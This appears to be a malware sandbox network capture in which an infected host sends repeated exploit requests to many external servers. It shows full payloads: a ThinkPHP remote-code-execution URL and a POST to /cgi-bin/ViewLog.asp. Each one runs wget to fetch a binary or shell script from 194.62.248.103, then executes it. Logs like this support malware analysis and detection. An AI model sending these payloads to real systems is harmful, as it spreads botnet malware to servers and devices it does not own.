                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 66 63 38 36 34 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 34 32 32 26 23 34 36 3b 31 31 34 66 33 30 35 63 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 35 66 63 38 36 34 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 34 32 32 26 23 34 36 3b 31 31 34 66 33 30 35 63 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;5fc8645f&#46;1713105422&#46;114f305c<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;5fc8645f&#46;1713105422&#46;114f305c</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        810192.168.2.235545695.173.100.14280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.074398994 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.380956888 CEST404INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        811192.168.2.234854495.100.52.17980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.087953091 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.406564951 CEST579INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 357
                                                        Expires: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 31 36 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 32 32 26 23 34 36 3b 31 33 36 64 39 65 35 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 35 31 36 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 32 32 26 23 34 36 3b 31 33 36 64 39 65 35 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;5161502&#46;1713105422&#46;136d9e5<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;5161502&#46;1713105422&#46;136d9e5</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        812192.168.2.235364095.216.225.14580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.088551044 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.409573078 CEST354INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        813192.168.2.235486295.180.163.7080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.109889984 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.457932949 CEST321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Sun, 14 Apr 2024 13:37:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        814192.168.2.235007695.170.154.8280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.144860029 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.521224976 CEST355INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 182
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        815192.168.2.233888431.136.84.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.255903959 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:05.460320950 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:11.603332043 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:23.633863926 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:48.974239111 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        816192.168.2.234476494.121.213.658080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.280464888 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        817192.168.2.233426431.200.89.938080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.280554056 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        818192.168.2.235706094.120.240.518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.281424999 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        819192.168.2.235538695.86.89.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.295360088 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        820192.168.2.235114895.100.77.19980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.375185966 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.674367905 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 39 37 61 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 34 32 32 26 23 34 36 3b 31 62 38 32 35 30 65 37 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 38 39 37 61 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 34 32 32 26 23 34 36 3b 31 62 38 32 35 30 65 37 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;897a7b5c&#46;1713105422&#46;1b8250e7<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;897a7b5c&#46;1713105422&#46;1b8250e7</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        821192.168.2.235348695.98.120.1080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.382338047 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.690192938 CEST691INHTTP/1.0 404 Not Found !!!
                                                        Pragma: no-cache
                                                        Content-type: text/html
                                                        WWW-Authenticate: /index.php
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 63 65 6e 74 65 72 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 31 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 30 30 41 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 66 61 63 65 3d 22 41 72 69 61 6c 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 33 46 33 46 33 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 3d 22 23 30 30 30 30 38 30 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 64 61 72 6b 3d 22 23 30 30 30 30 38 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 69 6e 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        822192.168.2.234243895.90.22.3080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.417216063 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.744489908 CEST516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Server: lighttpd/1.4.45
